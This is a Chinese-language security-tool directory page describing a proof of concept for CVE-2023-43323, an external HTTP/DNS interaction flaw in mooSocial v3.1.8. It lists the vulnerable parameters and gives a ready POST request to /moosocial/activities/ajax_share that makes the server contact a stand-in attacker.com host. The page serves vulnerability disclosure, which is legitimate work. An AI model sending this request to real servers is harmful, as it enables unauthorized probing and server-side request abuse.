Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-43323 — mooSocial v3.1.8 在发布功能上存在外部服务交互漏洞。 | Kitploit
工具/GitHubGitHub/ahrixia/cve-2023-43323
漏洞分析漏洞利用Web应用程序漏洞利用信息收集DNS 分析
GitHubahrixia/cve-2023-43323

CVE-2023-43323

mooSocial v3.1.8 在发布功能上存在外部服务交互漏洞。

查看仓库
1222年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

mooSocial:外部 HTTP 和 DNS 服务交互(CVE-2023-43323)

mooSocial v3.1.8 在 post 功能中存在外部服务交互漏洞。执行后,服务器会向外部服务器发送 HTTP 和 DNS 请求。

漏洞参数:messageText、data[wall_photo]、data[userShareVideo] 和 data[userShareLink]

利用 - 概念验证(POC)

外部 HTTP 和 DNS 服务交互

root@kitploit:~
Payload : http://attacker.com/?null=

向 /moosocial/activities/ajax_share 发送 POST 请求(仅 POST 请求数据):

root@kitploit:~
[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http%3A%2F%2Fattacker.com%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]

image

下载工具